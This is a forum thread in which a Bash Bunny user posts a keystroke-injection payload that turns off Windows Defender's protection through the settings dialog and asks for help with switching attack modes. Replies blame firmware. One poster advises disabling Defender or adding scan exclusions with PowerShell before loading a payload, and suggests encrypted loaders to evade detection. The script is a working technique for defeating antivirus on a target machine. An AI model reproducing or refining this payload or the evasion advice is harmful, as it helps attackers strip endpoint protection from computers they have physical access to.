Can't switch ATTACKMODE during payload


SamSepi46

I'm trying to write a simple payload that involves manually disabling Windows Defender. I need the 1st part of the payload to use ATTACKMODE HID and the 2nd part to use ATTACKMODE HID STORAGE. However, the Bash Bunny never seems to show up as a flash drive for that second part of the payload. What am I doing wrong?

#STAGE ONE
LED B FAST
ATTACKMODE HID 
Q GUI r
Q DELAY 125
Q STRING windowsdefender://threat/
Q DELAY 125
Q ENTER
Q DELAY 1000
Q TAB
Q DELAY 1000
Q TAB
Q DELAY 1000
Q TAB
Q DELAY 1000
Q TAB
Q DELAY 1000
Q ENTER
Q DELAY 3000
Q SPACE 
Q DELAY 3000
Q ALT Y
Q DELAY 50
Q ALT F4
Q DELAY 50
#STAGE 2
LED G FAST
ATTACKMODE HID STORAGE


Are you using a Bunny Mk1 or Mk2? Anyway, it really doesn't matter; I think it's related to firmware. There must be some issue with some parts of the Bunny features (perhaps in the ATTACKMODE script itself; I haven't looked further into it). When I run both my Mk1 and Mk2 on the latest firmware (1.7_332), the script (or variants of it) doesn't work. If I downgrade my Mk1 to the base firmware of the Mk1 (1.0_167), then the script works. You could submit a support ticket for this to try to get it sorted.


Just to be curious...

Why Storage?

If you want to play with Defender, go through PowerShell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode.
Depending on what you load, may I suggest encrypted loaders 🙂
Have fun ;)

/NX


Thank you both.

Dark_Pyyro - I use the Mk1. I assumed it was a firmware issue, but on the off chance it was user error (totally possible) I wanted to make sure there wasn't anything I was missing. I used the responder payload a couple of weeks back, and ever since then the switches never quite worked properly.

NoExecute - I tried to do it originally through PowerShell, but Windows "Tamper Protection" seems to block any change to the Windows firewall or Defender. Tamper Protection seems to be the only thing preventing me from disabling Defender with PowerShell.

I'm interested in hearing more about encrypted loaders. I don't think I have ever messed with them before, but if it means I can disable Defender with PowerShell, sign me up.


On 1/31/2022 at 3:13 PM, NoExecute said:

Just to be curious...

Why Storage?

If you want to play with Defender, go through PowerShell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode.
Depending on what you load, may I suggest encrypted loaders 🙂
Have fun 😉

/NX

I took your advice and it helped me.
